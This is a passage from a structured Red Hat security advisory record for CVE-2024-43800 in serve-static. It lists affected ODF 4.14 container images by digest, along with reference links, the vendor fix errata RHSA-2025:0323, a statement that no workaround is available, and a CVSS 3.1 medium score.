"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2025-01-15T01:19:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:0323", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", 